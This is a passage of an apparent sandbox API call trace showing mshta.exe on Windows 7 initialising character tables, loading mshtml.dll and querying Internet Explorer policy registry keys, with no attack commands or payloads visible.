¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā") returned 256 [0024.598] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x40eec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0024.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x40f6cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dê.\x86\x04ù@", lpUsedDefaultChar=0x0) returned 256 [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0024.599] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40f7cc, cbMultiByte=256, lpWideCharStr=0x40f0f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā") returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0024.599] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蘮Ā", cchSrc=256, lpDestStr=0x40eee8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0024.599] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x40f5cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1dê.\x86\x04ù@", lpUsedDefaultChar=0x0) returned 256 [0024.599] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2bb0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] 
SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.599] SetLastError (dwErrCode=0x0) [0024.599] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.600] SetLastError (dwErrCode=0x0) [0024.600] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] 
SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.601] GetLastError () returned 0x0 [0024.601] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.602] SetLastError (dwErrCode=0x0) [0024.602] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] 
SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.603] SetLastError (dwErrCode=0x0) [0024.603] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.604] SetLastError (dwErrCode=0x0) [0024.604] GetLastError () returned 0x0 [0024.605] 
SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.605] GetLastError () returned 0x0 [0024.605] SetLastError (dwErrCode=0x0) [0024.606] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2b2aef) returned 0x0 [0024.606] GetLastError () returned 0x0 [0024.606] SetLastError (dwErrCode=0x0) [0024.606] GetLastError () returned 0x0 [0024.606] SetLastError (dwErrCode=0x0) [0024.606] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetLastError () returned 0x0 [0024.607] SetLastError (dwErrCode=0x0) [0024.607] GetVersion () returned 0x1db10106 [0024.607] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76c10000 [0024.607] GetProcAddress (hModule=0x76c10000, lpProcName="HeapSetInformation") returned 0x76c64157 [0024.607] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0024.607] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x40f964 | out: phkResult=0x40f964*=0x26) returned 0x0 [0024.607] RegQueryValueExA (in: hKey=0x26, lpValueName=0x0, lpReserved=0x0, lpType=0x40f95c, 
lpData=0x550e78, lpcbData=0x40f958*=0x105 | out: lpType=0x40f95c*=0x1, lpData="C:\\Windows\\System32\\mshtml.dll", lpcbData=0x40f958*=0x1f) returned 0x0 [0024.607] LoadLibraryA (lpLibFileName="C:\\Windows\\System32\\mshtml.dll") returned 0x63150000 [0026.020] GetVersion () returned 0x1db10106 [0026.020] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76c10000 [0026.020] GetProcAddress (hModule=0x76c10000, lpProcName="HeapSetInformation") returned 0x76c64157 [0026.020] HeapSetInformation (HeapHandle=0xf0000, HeapInformationClass=0x0, HeapInformation=0x40f5f4, HeapInformationLength=0x4) returned 1 [0026.176] GetVersion () returned 0x1db10106 [0026.178] GetVersionExA (in: lpVersionInformation=0x40f4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f4cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.178] __dllonexit () returned 0x6337717c [0026.178] __dllonexit () returned 0x633773bd [0026.178] __dllonexit () returned 0x63377435 [0026.178] __dllonexit () returned 0x63376e75 [0026.179] __dllonexit () returned 0x63376ff5 [0026.179] __dllonexit () returned 0x633771be [0026.179] __dllonexit () returned 0x633772e2 [0026.179] __dllonexit () returned 0x63377320 [0026.180] __dllonexit () returned 0x63377370 [0026.180] __dllonexit () returned 0x63376e53 [0026.180] __dllonexit () returned 0x63376e66 [0026.180] __dllonexit () returned 0x63376a3e [0026.180] __dllonexit () returned 0x63376a46 [0026.181] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc197 [0026.181] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc197 [0026.181] __dllonexit () returned 0x63376a60 [0026.181] __dllonexit () returned 0x63376a7a [0026.181] __dllonexit () returned 0x63376a93 [0026.181] __dllonexit () returned 0x63376aa7 [0026.182] __dllonexit () returned 
0x63376ac1 [0026.182] __dllonexit () returned 0x633771f1 [0026.182] __dllonexit () returned 0x63376ad0 [0026.183] __dllonexit () returned 0x63376adf [0026.183] __dllonexit () returned 0x63376aee [0026.183] __dllonexit () returned 0x63376afd [0026.183] __dllonexit () returned 0x63376b0d [0026.183] __dllonexit () returned 0x6337720c [0026.184] __dllonexit () returned 0x63376b1c [0026.184] __dllonexit () returned 0x63376b2f [0026.184] __dllonexit () returned 0x63376b49 [0026.184] __dllonexit () returned 0x63376b58 [0026.184] __dllonexit () returned 0x63376b67 [0026.185] __dllonexit () returned 0x63376b76 [0026.185] __dllonexit () returned 0x63376b85 [0026.185] __dllonexit () returned 0x63376b94 [0026.185] __dllonexit () returned 0x63376ba3 [0026.185] __dllonexit () returned 0x63376bb2 [0026.186] __dllonexit () returned 0x63376bc1 [0026.186] __dllonexit () returned 0x63376bd0 [0026.186] __dllonexit () returned 0x63376bdf [0026.186] __dllonexit () returned 0x63376bee [0026.186] __dllonexit () returned 0x63376bfd [0026.186] __dllonexit () returned 0x63376c0c [0026.187] __dllonexit () returned 0x63376c1b [0026.187] __dllonexit () returned 0x63376c2a [0026.187] __dllonexit () returned 0x63376c3d [0026.187] __dllonexit () returned 0x63376c4c [0026.187] __dllonexit () returned 0x63376c5b [0026.188] __dllonexit () returned 0x63376c75 [0026.188] __dllonexit () returned 0x63376c8f [0026.188] __dllonexit () returned 0x63376ca9 [0026.188] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0026.189] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0026.189] __dllonexit () returned 0x63376cb1 [0026.189] __dllonexit () returned 0x63377294 [0026.190] __dllonexit () returned 0x63376ccb [0026.190] __dllonexit () returned 0x63376cd3 [0026.190] __dllonexit () returned 0x63376ce2 [0026.190] __dllonexit () returned 0x63376cf1 [0026.190] __dllonexit () returned 0x63376d00 [0026.190] __dllonexit () returned 0x6336f72d 
[0026.191] __dllonexit () returned 0x63376d43 [0026.191] __dllonexit () returned 0x63376d56 [0026.191] __dllonexit () returned 0x6336f095 [0026.191] __dllonexit () returned 0x63376d65 [0026.191] __dllonexit () returned 0x63376d78 [0026.192] __dllonexit () returned 0x63376d87 [0026.192] __dllonexit () returned 0x63376d9a [0026.192] __dllonexit () returned 0x63372256 [0026.193] __dllonexit () returned 0x6337679d [0026.193] __dllonexit () returned 0x63376dd5 [0026.193] __dllonexit () returned 0x63376df8 [0026.193] __dllonexit () returned 0x63376e07 [0026.193] __dllonexit () returned 0x633776cb [0026.194] __dllonexit () returned 0x63376e1a [0026.194] __dllonexit () returned 0x633772aa [0026.194] __dllonexit () returned 0x633772cb [0026.195] __dllonexit () returned 0x63376e3a [0026.195] GetCurrentThreadId () returned 0xa1c [0026.195] CoCreateGuid (in: pguid=0x6368ad20 | out: pguid=0x6368ad20*(Data1=0x90052b94, Data2=0xf35f, Data3=0x4062, Data4=([0]=0xa8, [1]=0xfe, [2]=0x7d, [3]=0xa8, [4]=0xa1, [5]=0x94, [6]=0xe3, [7]=0x9e))) returned 0x0 [0026.201] __dllonexit () returned 0x6337733d [0026.201] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40ef6c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.201] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.201] StrCmpICW (pszStr1="mShta.exe", pszStr2="iexplore.exe") returned 4 [0026.201] StrCmpICW (pszStr1="mShta.exe", pszStr2="explorer.exe") returned 8 [0026.201] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x10d6d8 [0026.201] SHRegGetValueW () returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b8 | out: phkResult=0x40f1b8*=0x0) returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet 
